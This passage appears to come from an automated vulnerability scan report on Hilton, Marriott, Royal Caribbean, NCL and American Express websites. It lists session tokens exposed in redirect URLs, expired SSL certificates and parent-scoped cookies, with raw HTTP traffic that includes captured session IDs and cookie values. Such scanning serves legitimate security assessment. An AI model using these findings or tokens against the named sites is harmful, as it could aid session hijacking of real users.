Date: Mon, 03 Oct 2011 13:01:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 625

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://embassysuites1.hilton.com/en_US/es/hotel/BOSAPES/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800460,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://embassysuites1.hilton.com/en_US/es/hotel/BOSAPES/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800460,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317
...[SNIP]...
9.29. http://www3.hilton.com/en_US/gi/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/gi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/gi/doxch.htm?dst=http://PFS-GI/en_US/gi/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://hiltongardeninn1.hilton.com/en_US/gi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801260,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:10 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 601

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://hiltongardeninn1.hilton.com/en_US/gi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801260,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://hiltongardeninn1.hilton.com/en_US/gi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801260,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&am
...[SNIP]...
9.30. http://www3.hilton.com/en_US/hh/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hh/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hh/doxch.htm?dst=http://PFS-HH/en_US/hh/home_index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://hhonors1.hilton.com/en_US/hh/home_index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800177,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:31 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:01:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 595

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://hhonors1.hilton.com/en_US/hh/home_index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800177,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://hhonors1.hilton.com/en_US/hh/home_index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800177,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;<
...[SNIP]...
9.31. http://www3.hilton.com/en_US/hi/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hi/doxch.htm?dst=http://PFS-HI/en_US/hi/hotel/BOSLHHH/index.do HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.996; mmid=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=-478419714%7CAgAAAAodekFwyAYAAA%3D%3D; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635640479:ss=1317635584777

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789623,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 12:53:29 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 12:53:39 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 605

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789623,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789623,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
...[SNIP]...
9.32. http://www3.hilton.com/en_US/hp/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hp/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hp/doxch.htm?dst=http://PFS-HP/en_US/hp/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://hamptoninn1.hilton.com/en_US/hp/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800600,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:47 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:01:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 591

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://hamptoninn1.hilton.com/en_US/hp/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800600,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://hamptoninn1.hilton.com/en_US/hp/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800600,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a
...[SNIP]...
9.33. http://www3.hilton.com/en_US/ht/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/ht/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/ht/doxch.htm?dst=http://PFS-HT/en_US/ht/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://home2suites1.hilton.com/en_US/ht/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801354,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:14 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 593

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://home2suites1.hilton.com/en_US/ht/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801354,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://home2suites1.hilton.com/en_US/ht/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801354,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</
...[SNIP]...
9.34. http://www3.hilton.com/en_US/hw/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hw/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/hw/doxch.htm?dst=http://PFS-HW/en_US/hw/hotel/BOSARHW/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://homewoodsuites1.hilton.com/en_US/hw/hotel/BOSARHW/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800879,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:01:57 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 627

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://homewoodsuites1.hilton.com/en_US/hw/hotel/BOSARHW/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800879,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://homewoodsuites1.hilton.com/en_US/hw/hotel/BOSARHW/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041800879,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!131
...[SNIP]...
9.35. http://www3.hilton.com/en_US/wa/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/wa/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en_US/wa/doxch.htm?dst=http://PFS-WA/ HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://waldorfastoria.com/;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:02 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 549

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://waldorfastoria.com/&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://waldorfastoria.com/&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...
9.36. http://www3.hilton.com/es/hi/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /es/hi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /es/hi/doxch.htm?dst=http://PFS-HI/es/hi/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www1.hilton.com/es/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801562,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:21 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 571

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www1.hilton.com/es/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801562,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://www1.hilton.com/es/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801562,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...
9.37. http://www3.hilton.com/fr/hi/doxch.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /fr/hi/doxch.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /fr/hi/doxch.htm?dst=http://PFS-HI/fr/hi/index.do HTTP/1.1
Host: www3.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www1.hilton.com/fr/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801668,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:24 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 571

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www1.hilton.com/fr/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801668,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://www1.hilton.com/fr/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801668,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...
10. SSL certificate  previous  next
There are 8 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

10.1. https://secure2.hilton.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure2.hilton.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  secure2.hilton.com
Issued by:  VeriSign Class 3 Secure Server CA
Valid from:  Thu May 08 19:00:00 CDT 2008
Valid to:  Tue May 11 18:59:59 CDT 2010
10.2. https://wwwa.applyonlinenow.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://wwwa.applyonlinenow.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  wwwa.applyonlinenow.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Wed Aug 10 19:00:00 CDT 2011
Valid to:  Mon Sep 03 18:59:59 CDT 2012
10.3. https://secure.hilton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.hilton.com,ST=Tennessee
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Nov 18 09:27:10 CST 2010
Valid to:  Fri Nov 18 09:27:10 CST 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
10.4. https://secure3.hilton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.hilton.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Tue Aug 02 19:00:00 CDT 2011
Valid to:  Wed Sep 12 18:59:59 CDT 2012

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
10.5. https://www.marriott.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.marriott.com,ST=MARYLAND
Issued by:  Akamai Subordinate CA 3
Valid from:  Fri Sep 16 07:35:04 CDT 2011
Valid to:  Sun Sep 16 07:35:04 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
10.6. https://www.marriottregistry.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriottregistry.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.marriottregistry.com
Issued by:  GeoTrust SSL CA
Valid from:  Wed Aug 11 15:46:29 CDT 2010
Valid to:  Wed Sep 12 20:29:51 CDT 2012

Certificate chain #1

Issued to:  GeoTrust SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:39:26 CST 2010
Valid to:  Tue Feb 18 16:39:26 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022
10.7. https://www2.ncl.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.ncl.com,ST=FLORIDA
Issued by:  Akamai Subordinate CA 3
Valid from:  Fri Aug 05 07:18:26 CDT 2011
Valid to:  Sun Aug 05 07:18:26 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018
10.8. https://www201.americanexpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www201.americanexpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www201.americanexpress.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Jul 27 19:00:00 CDT 2011
Valid to:  Wed Aug 15 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028
11. Cookie scoped to parent domain  previous  next
There are 82 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

11.1. http://www.royalcaribbean.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.royalcaribbean.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.royalcaribbean.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: IBM_HTTP_Server
Location: http://www.royalcaribbean.com/home.do
Content-Length: 0
Content-Type: text/plain
Content-Language: en
Date: Mon, 03 Oct 2011 12:41:00 GMT
Connection: close
Set-Cookie: JSESSIONID=0000Hnty0rieXZnxmfuPhXDAbub:12h3g0fq2; Path=/; Domain=royalcaribbean.com

11.2. http://www3.hilton.com/en_US/hi/search/findhotels/passiveSearch.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www3.hilton.com
Path:   /en_US/hi/search/findhotels/passiveSearch.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/search/findhotels/passiveSearch.htm?xch=1041788380,4E9B21AE664381D1B53DE8378483FB39.etc13&it=Find,city&minLengthOfStay=0&hdnNumRoomsInAdv=N&checkin=03+Oct+2011&specialCodeCorporate=&hdnMainAction=/search/findhotels/passiveSearch.htm&specialCodeGroup=&brandIdLowerCase=hi&brandId=HI&isHomePage=true&searchType=all&location=0&ctyhocn=&numberOfRooms=1&room4Adults=1&room1Adults=1&room3Adults=1&source=PFSBrandHomeSearch&room2Adults=1&room3Children=0&locale=en_US&hdnPFSIsResPage=Y&hotelSearchOneBox=bos&isReward=false&hdnGuestSuits=1&room1Children=0&hdnGuestSuitsIndex=0&hdnSerchType=N&flexibleSearch=false&globalWebLite=&brands=HI&dynamoLocale=en&hdnPage=Y&checkout=04+Oct+2011&specialCodePromotion=&room4Children=0&roomsRequested=1&queryOneBox=bos&units=MI&room2Children=0&pageBrandId=HI HTTP/1.1
Host: www3.hilton.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Location: http://www3.hilton.com/en_US/hi/search/findhotels/results.htm?view=LIST
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; domain=.hilton.com; path=/; HttpOnly
Set-Cookie: corporateId=; domain=.hilton.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 337

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www3.hilton.com/en_US/hi/se
...[SNIP]...
11.3. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

